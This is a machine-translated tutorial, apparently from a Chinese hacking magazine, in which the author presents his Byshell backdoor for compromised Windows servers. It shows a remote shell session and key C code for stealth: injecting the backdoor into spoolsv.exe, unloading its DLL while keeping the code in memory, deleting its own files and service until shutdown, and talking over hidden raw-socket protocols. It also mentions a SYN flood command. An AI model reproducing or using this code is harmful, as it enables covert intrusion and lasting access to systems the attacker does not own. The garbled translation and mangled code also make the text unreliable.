Byshell BACKDOOR: No process, no DLL, no hard disk file

Suitable for readers: Intrusion fans, network administrators, and black machine fans

Prerequisites: C basic syntax

Liu: backdoors are an eternal topic for hackers. More and more people are paying attention to server security after the hacking of major websites such as 163, Yahoo, and Peking University, various backdoor technologies have never been violent! Today, we will bring you a heavyweight backdoor use and programming method, so that the majority of new friends can have a good backdoor to play, so that programming technology enthusiasts can have a good backdoor Programming Technology for reference. Of course, more new technologies are waiting for you to explore.

Byshell BACKDOOR: No process, no DLL, no hard disk file, no startup Item

Nowadays, there are many popular tools for Post-Trojan Horse categories on the Internet, but there are not many tools that can be called excellent products. Most new users are still using software such as Radmin to replace Backdoor programs. Unfortunately, they are not really backdoors and are very easy to detect by server administrators. Therefore, it is normal for bots to fly normally.

A qualified backdoor should at least prevent a strange process from being stored in the task manager, and give the backdoor process a name that looks like a system process just to hide its ears; you cannot leave a well-known startup key value or add a service in the registry Run startup Item or service startup Item. Of course, you cannot directly write the startup Item of the Start Menu; you cannot open a strange port like a Bits without ignoring the administrator or firewall. dll does not have a port while waiting for connection, and the program that opens a port during connection only has a 30% chance of escaping during port check. In addition, it is best to use a backdoor to hide your own generated files, or to avoid infection with system files that administrators often check for integrity. The backdoor programs not implemented in the first three points are not "relatively advanced" Backdoor programs. Of course, they do not have stability and confidentiality when used.

According to my classification, the common backdoors can be divided into three levels ":

★Application-level. For example, WinShell, Radmin, and glacier, they basically do not use other methods to hide themselves, just a common application that can achieve remote control.

★System level. More or less use of Ring3 hidden tracking programming technology, such as Bits. dll, Portless, use more, such as Hxdef.

TIPS: Although Hxdef has a driver, it applies Ring3 to all system hooks. Therefore, we tend to call it a system-level backdoor rather than a kernel-level backdoor.

★At the kernel level, the backdoor mainly works in Ring0, so it is highly concealed and lethal. However, the total number of kernel-level backdoors published is small, and the compatibility is not satisfactory. This topic has many valuable discussions and achievements published on Phrack and Rootkit.com.

I tried my best to meet the above requirements in my own system-level backdoor Byshell v0.64. However, due to my limited personal ability, the function implementation is not comprehensive and stable, I hope you can give me some suggestions or upgrade the version for me. In this article, I will discuss with you the design and implementation of this open-source backdoor. Of course, there are also practical application examples. I hope that you will not throw bricks and discuss them together.

Application Example

This is a backdoor program that implements no process, no DLL, no hard disk files, no startup items. Inject DLL to system processes using threads, remove DLL ing, delete its own files and startup items, and restore the system when it is shut down. I have learned a lot from the ideas of Cmdbind2, and I would like to extend my 120 thanks to my predecessors for their selfless sharing. I allow the software and its source code to be freely transmitted, but the source should be indicated when referencing. You shall not modify or delete the software for commercial purposes and use it for learning and private purposes prior to contacting the author and obtaining consent.

Byshell 0.64 supports the following command lists: cmd, shell, endshell, chpass, byver, sysinfo, pslist, pskill, modlist, get, put, reboot, dettach, popmsg, SYN, queryDOS, endDOS, refresh, etc. For detailed usage, please refer to the instruction manual.

TIPS: the refresh command is missing in the manual. It is used to clear dead connections and give you a chance to reconnect. You can also change the IP address after you change the IP address, clear the original connection (otherwise the connection fails ).

After installation, you only need to upload ntboot.exeand ntboot.dllto the same directory as the meat chicken and execute "“ntboot.exe -install.exe". After installation, You can manually delete ntboot.exeand ntboot.dlland use by064cli.exe for connection. Note that Byshell v0.64 does not support local testing on the local machine. It can be v 0.63. Now I will use v 0.63 to demonstrate the effect:

1. Connection:

Please input the server ip address

127.0.0.1

127.0.0.1 will be connected

Input the password (the default one is 'by ')

By

# Export dir c:

The volume in drive C is not labeled.

The serial number of the volume is the CCB2-D751

C: Directory

<DIR> Documents and Settings

<DIR> Inetpub

2004-11-17 20:56 <DIR> Intel

24,576 isapilog. dll

2004-11-11 24,576 magic_asp.dll

<DIR> My Music

124 Operate. ini

<DIR> Program Files

<DIR> ubackup

<DIR> WINNT

3 files in 49,276 bytes

124,207,104 bytes available for 7 Directories

2. Obtain and end the Shell:

# Shell

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C: WINNTsystem32> cd ..

Cd ..

C: WINNT> cd ..

Cd ..

C:> dir

Dir

The volume in drive C is not labeled.

The serial number of the volume is the CCB2-D751

C: Directory

...... Omitted

3 files in 49,276 bytes

124,207,104 bytes available for 7 Directories

C:> endshell

Shell terminated

# Byver

ByShell server version 0.63

Released Dec 19,2004 Copyleft @ "by" co. ltd.

3. process listing and Kill. There are bugs, which are not neatly arranged.

# Pslist

Process:

Pid filename num_thread parentpid

8 System 43 0

184 smss.exe 6 8

208 csrss.exe 11 184

232 winlogon.exe 19 184

260 services.exe 31 232

272 lsass.exe 17 232

456 svchost.exe 11 260

488 SPOOLSV. EXE 14 260

524 msdtc.exe 21 260

636 svchost.exe 18 260

656 llssrv.exe 9 260

688 sqlservr.exe 28 260

776 winmgmt.exe 3 260

812 dfssvc.exe 2 260

832 inetinfo.exe 29 260

856 mssearch.exe 6 260

1224 svchost.exe 11 260

1176 assumer.exe 19 1172

1356 igfxtray.exe 2 1176

1404 PFWMain.exe 4 1176

1412 SOUNDMAN. EXE 2 1176

1428 realsched.exe 4 1176

1436 internat.exe 1 1176

1444 sqlmangr.exe 3 1176

1280 BitComet.exe 9 1176

328 notepad.exe 2 1176

1196 MDM. EXE 5 456

1512 conime.exe 1 1088

1520 cmd.exe 1 488

1504 by063cli.exe 1 1176

# Pskill1428

OK, job was done, cuz we have localsystem & SE_DEBUG_NAME :)

# Modlist1520

Mods' of 1520:

Module_id module_name module_path

1 ntdll. dll C: WINNTSystem32ntdll. dll

1 KERNEL32.dll C: WINNTsystem32KERNEL32. dll

1 USER32.dll C: WINNTsystem32USER32. dll

1 GDI32.DLL C: WINNTsystem32GDI32. DLL

1 ADVAPI32.dll C: WINNTsystem32ADVAPI32. dll

1 RPCRT4.DLL C: WINNTsystem32RPCRT4. DLL

1 MSVCRT. dll C: WINNTsystem32MSVCRT. dll

1 IMM32.DLL C: WINNTSystem32IMM32. DLL

#

Now, let's introduce the three most common functions. In fact, in many cases, these three functions are the most basic and difficult to ensure stability, however, the most prominent feature of this backdoor should be the implementation of no process, no DLL, no hard disk files, no startup items. In actual use, we believe that you will find its advantages, the following describes how these functions are implemented from the perspective of design and programming.

Design & Programming

In this section, I will not list the complete code because it is too long. I will reference the key code to illustrate the writing ideas.

First, how can we hide our processes? A common method is remote thread injection. But its biggest problem is that after the code is injected into the address space of the remote process, due to the changes in the address space, it depends on all the direct addressing commands in the original address space to be relocated. This is easy to understand for assembler veterans. for High-level language programmers, this means all explicit and non-explicit global variables (such as API addresses and strings) both require manual relocation.

Compared with virus programs, we are very happy because our syringe can inject a "global variable block" to remote processes at the same time and then transmit the address of this block to remote functions, then, this block is used in remote functions to replace directly addressable global variables, thus avoiding the need to write completely "self-relocable" code. The latter is considered very cumbersome and almost impossible to implement in advanced languages. However, even in this case, the complexity of code that can be relocated is still relatively large, and the backdoor programs with many functional modules will be very tired. Cmdbind2, a farmer's predecessor, implements a completely manual relocate injection backdoor. We can see from his source code that he has spent a lot of code only on implementing the most common Bind Shell, A complicated backdoor with features such as ByShell v0.64 is hard to imagine.

Instead of writing the relocated Code directly, the common method is to load a DLL in the function injected into the remote process. In this way, the system will relocate you, and the main function of the backdoor is implemented in the DLL. For example, in the previous anti-DDoS pro, single Changhong introduced this method. This method also has a small drawback: the Administrator will find an unknown DLL During review of the injected process, resulting in backdoor exposure. The peasant predecessors proposed a way of thinking: First load the DLL, then copy all the memory to other places, uninstall the DLL, and then apply for the same address space as the original DLL load, copy the DLL Code stored elsewhere back to this space. Then we directly call this DLL to solve all the relocation problems. Our DLL will not appear in the list of loaded modules of the injected process. The peasant Elder did not implement his idea as code. I will give the main code that I can implement in this way.

We will also discuss other system-level hidden process methods during the comparison and discussion. Bingle uses the method of replacing the DLL service started by Svchost to load the backdoor. ZXshell also uses this method. The main problem of this type of registration is unstable. The registration table sensitive key value is changed and an unknown module appears in the loading module of svchost.exe. Of course, replacing the original DLL with a trojan DLL with the same name can avoid the above problems, but there will be new problems, this is how to bypass Windows System File Protection and the Administrator's routine system file integrity check.

Hxdef uses the Hook ring3 API (NativeAPI of Ntdll. dll) to hide all its aspects. This method works well for common Ring3 checks and can partially implement port multiplexing. The main problem is that there are not many methods to Hook in Ring3, and the effect is not very good, because it is more "active" (Hxdef injects Trojan data into all processes in the system, it is easily discovered by Ring0 RootKit Detector, such as ICESWORD. Finally, programming is cumbersome.

. See the Code:

Void injcode () {HANDLE prohandle; // injection object Process HANDLE

DWORD pid = 0; // The PID of the object Process

Int ret; // Temporary Variable

// Use the toolhelp32 function to obtain the injection object PID.

Sleep (1000 );

HANDLE snapshot;

Snapshot = createconlhelp32snapshot (TH32CS_SNAPPROCESS, 0 );

Struct tagPROCESSENTRY32 processsnap; processsnap. dwSize = sizeof (tagPROCESSENTRY32 );

Char injexe [] = "spoolsv.exe"; // inject the object process. You can modify it by yourself.

For (Process32First (snapshot, & processsnap );

Process32Next (snapshot, & processsnap );)

}

CloseHandle (snapshot); // obtain the PID

// Obtain the SE_DEBUG_NAME permission

HANDLE hToken;

OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, & hToken );

TOKEN_PRIVILEGES tp;

Tp. PrivilegeCount = 1;

LookupPrivilegeValue (NULL, SE_DEBUG_NAME, & tp. Privileges [0]. Luid );

Tp. Privileges [0]. Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges (hToken, 0, & tp, sizeof (tp), 0, 0 );

// Inject now

Prohandle = OpenProcess (PROCESS_ALL_ACCESS, 1, pid );

Dword winapi injfunc (LPVOID); // Injfunc is the injection function and needs to be manually relocated

// Obtain the required API address and write it into the global variable block to be injected. Injapistr is the global structure and the content of the global variable block.

HMODULE hModule;

LPVOID paramaddr; // global variable block address

HModule = LoadLibrary ("kernel32.dll ");

Injapistr. myLoadLibrary = (struct HINSTANCE _ * (_ stdcall *) (const char *) GetProcAddress (hModule, "LoadLibraryA ");

Injapistr. myGetProcAddress = (FARPROC (_ stdcall *) (HMODULE, LPCTSTR) GetProcAddress (hModule, "GetProcAddress ");

Injapistr. myVirtualAlloc = (void * (_ stdcall *) (void *, unsigned long) GetProcAddress (hModule, "VirtualAlloc ");

Injapistr. myFreeLibrary = (int (_ stdcall *) (struct HINSTANCE _ *) GetProcAddress (hModule, "FreeLibrary ");

Injapistr. myIsBadReadPtr = (int (_ stdcall *) (const void *, unsigned int) GetProcAddress (hModule, "IsBadReadPtr ");

Injapistr. myVirtualFree = (int (_ stdcall *) (void *, unsigned long, unsigned long) GetProcAddress (hModule, "VirtualFree ");

// Allocate the global variable block in the target process and write it to the API address

Paramaddr = VirtualAllocEx (prohandle, 0, sizeof (injapistr), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

Ret = WriteProcessMemory (prohandle, paramaddr, & injapistr, sizeof (injapistr), 0 );

// Write the Injfunc Function

Void * injfuncaddr = VirtualAllocEx (prohandle, 0,20000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

Ret = WriteProcessMemory (prohandle, injfuncaddr, injfunc, 20000,0 );

// Activate the remote thread

CreateRemoteThread (prohandle, 0, 0, (DWORD (WINAPI *) (void *) injfuncaddr, paramaddr, 0, 0 );

CloseHandle (prohandle );

Return;

}

// Inject remote functions to complete the arduous task of loading and uninstalling complex trojan DLL Functions

Dword winapi injfunc (LPVOID paramaddr ){

// Paramaddr, the first address of the global variable block. All static global variables need to be relocated (directly Addressable), but dynamic allocation (heap, Virtualalloc) and stack variables are not required because they use Indirect addressing. In fact, strings can also be written into the global variable block just now, but there are not many strings. We can use ASM directly here.

Char ntboot [16];

Char msgbox [16]; // The variable name is incorrect. It should be the main function name of the DLL backdoor. Khan, hope not to mislead everyone.

INJAPISTR * pinjapistr = (INJAPISTR *) paramaddr;

_ Asm {

Mov ntboot, 'n'

Mov ntboot + 1, 'T'

Mov ntboot + 2, 'B'

Mov ntboot + 3, 'O'

Mov ntboot + 4, 'O'

Mov ntboot + 5, 'T'

Mov ntboot + 6 ,'.'

Mov ntboot + 7, 'd'

Mov ntboot + 8, 'l'

Mov ntboot + 9, 'l'

Mov ntboot + 10, 0

Mov msgbox, 'C'

Mov msgbox + 1, 'M'

Mov msgbox + 2, 'D'

Mov msgbox + 3,'s'

Mov msgbox + 4, 'E'

Mov msgbox + 5, 'R'

Mov msgbox + 6, 'V'

Mov msgbox + 7, 'I'

Mov msgbox + 8, 'C'

Mov msgbox + 9, 'E'

Mov msgbox + 10, 0

}

HMODULE hModule = pinjapistr-> myLoadLibrary (ntboot); // load Ntboot. dll

DWORD (WINAPI * mydomainservice) (LPVOID); // name of the main function of the DLL Backdoor

Mydomainservice = (DWORD (WINAPI *) (LPVOID) (pinjapistr-> myGetProcAddress (hModule, msgbox ));

// You can see the following:

Unsigned int memsize = 0;

Void * tempdll = pinjapistr-> myVirtualAlloc (0, 0x23000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

Memcpy (tempdll, hModule, 0x23000 );

// 0x23000 is the DLL size, not many. If you change the Ntboot. dll size, adjust this value.

Pinjapistr-> myFreeLibrary (hModule );

HModule = (HMODULE) pinjapistr-> myVirtualAlloc (hModule, 0x23000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );

Memcpy (hModule, tempdll, 0x23000 );

Pinjapistr-> myVirtualFree (tempdll, 0x23000, MEM_DECOMMIT );

// End. The DLL is not loaded, but it can be used again. Is it refreshing ?!

Mydomainservice (0); // call the main function of the backdoor.

Return 0;

}

The next problem is the startup Item and file. Ntboot.exe is a backdoor injector that starts itself as a service. We must not allow the Administrator to discover the service key value. What should I do? This is also the idea raised by the peasant predecessors: First Delete All backdoor files and services, set a shutdown notification and a one-click shutdown hook, and write files and service items when the system is about to shut down. Similarly, once the service is started, it will be deleted first. In this way, no files and no startup items are implemented. The Administrator cannot identify exceptions or find our backdoor files by comparing them with the Registry. Let's take a look at the code that sets a shutdown notification and a one-click shutdown HOOK:

Dword winapi hookthread (LPVOID lpParam ){

MSG msg; int tmpret; char tmpstr [2, 100];

Lresult callback JournalRecordProc (int code, WPARAM wParam, LPARAM lParam );

Msghook = SetWindowsHookEx (WH_JOURNALRECORD, JournalRecordProc, GetModuleHandle (0), 0 );

If (! Msghook)

Tmpret = SetConsoleCtrlHandler (HandlerRoutine, 1 );

If (! Tmpret)

While (GetMessage (& msg, NULL, 0, 0) {void resume ();

If (msg. message = WM_QUERYENDSESSION)

}

UnhookWindowsHookEx (msghook );

Return 0;

}

Bool winapi HandlerRoutine (DWORD dwCtrlType) {void resume ();

Switch (dwCtrlType)

{

Case CTRL_SHUTDOWN_EVENT:

Resume (); // The resume function, as the name suggests, is the file recovery startup Item.

Break;

Default:

Break;

}

Return 0;

}

Lresult callback JournalRecordProc (int code, WPARAM wParam, LPARAM lParam) {void resume ();

If (code <0) {return CallNextHookEx (msghook, code, wParam, lParam );}

If (code = HC_ACTION ){

EVENTMSG * pevent = (EVENTMSG *) lParam;

If (pevent-> message = WM_KEYDOWN & LOBYTE (pevent-> paramL) = 0xFF)

}

Return CallNextHookEx (msghook, code, wParam, lParam );

}

Compared with the Native API of the Hook file registry of Hxdef, the advantage of this method is that there is no file at all, and no Ring0 Rootkit Detector will find the files and registry items hidden by the Hook API. The disadvantage is that if the other party directly pulls the power off, we will "rest in peace. So we will comfort ourselves and say: this backdoor is sufficiently concealed and won't let the other party suspect that it is in the middle of the backdoor, so that BT means of power-down and shutdown will be adopted. Of course, if you use Hxdef, believe me, the current Rootkit Detector is very common, Hxdef has become the target of all people, and the Administrator will "rest in peace" during the inspection.

The last step is how to implement no port (such as hiding the port with Rootkit, which is not called no port. This is a weakness of Byshell v0.64. It is difficult for Ring3 to reuse ports, you can only use Raw_socket to listen to TCP for Bits. dll-like "no port while waiting for connection"; load yourself into an SPI basic service provider or a layered service provider, You can intercept all Ring3 network communication, however, we will leave enough information in the Registry and system to cause our backdoors to "rest in peace ". Although the Recv/WSArecv method of all processes in the Hxdef Hook system cannot reuse the Ring0 port, such as port 139,445, it still seems better to be the Ring3 port multiplexing method. So far, Byshell adopts the custom Socket_raw protocol, that is, non-TCP and non-UDP protocols for communication, which can be used to communicate with most of the software firewalls and some hardware firewalls, however, the disadvantage is that it does not pass through all firewalls and does not support Windows XP SP2, because the latter removes Socket_raw support. My implementation is relatively simple, that is, using a Protocol Number 224 to listen for connection and refresh, and another protocol number 225 to transmit backdoor data, which is very simple:

WSADATA WSAData;

WSAStartup (MAKEWORD (2, 2), & WSAData );

SOCKET sock224 = socket (AF_INET, fig, 224 );

Sockaddr_in srvaddr;

Memset (& srvaddr, 0, sizeof (struct sockaddr_in ));

Srvaddr. sin_family = AF_INET;

Srvaddr. sin_addr.S_un.S_addr = INADDR_ANY;

Ret = bind (sock224, (struct sockaddr *) & srvaddr, sizeof (struct sockaddr ));

If (ret) {goto label2 ;}

DwThreadId = 0; char buffcycle [128];

Dword winapi threadfunc (LPVOID lpParam );

HANDLE thrdhndl;

// Create a 225 connection thread

Thrdhndl = CreateThread (0, 0, threadfunc, 0, 0, & dwThreadId );

// Wait for Refresh

While (1) {recvfrom (sock224, buffets, 0 );

If (! Strncmp (buffenders + 32 + sizeof (IP_HEADER), "+ _) (* & ^ % $ #@!~ Byrefreshbreak ", 27 )&&! Strncmp (buffenders + sizeof (IP_HEADER), pwd, strlen (pwd ))){

TerminateThread (thrdhndl, 0); goto label1 ;}

}

In the code of 225, I implemented simple error control. The code is long and I will not list it here. If you are interested, please refer to the source code. This reuse method is not very reliable and stable, so I published Byshell v0.63, which directly opened a TCP port 138, completely does not meet the backdoor requirements, however, it is okay to use it for testing. If you find that Byshell v0.64 is not very stable, try v0.63. However, a serious mistake is that I leaked a command "refresh" in Byshell v0.64, which can clear the 225 connection and give you a chance to reconnect.

Finally, Byshell implements many commands, such as viewing system information, executing commands, uploading and downloading in backdoor connections, and even SYN flood attacks. The function module of the backdoor is the Work () function, which facilitates function expansion and modular programming. I will continue to upgrade the port reuse status. In the future, it may be written as Ring3 reuse like Hxdef, Or something like Ring0 filter driver. I also hope that our predecessors will continue to guide me.

My code style is not good. I like not to branch or compact code, but I still hope you can develop this software together. In this backdoor writing, three people helped me a lot. Please allow me to take up space to express my gratitude to them. They are gxisone and glacier, and of course there are farmers. This backdoor should be their credit.

If you have any questions or want to communicate with me, Please Mail to baiyuanfan@163.com, thank you for your attention and support for ByShell and me.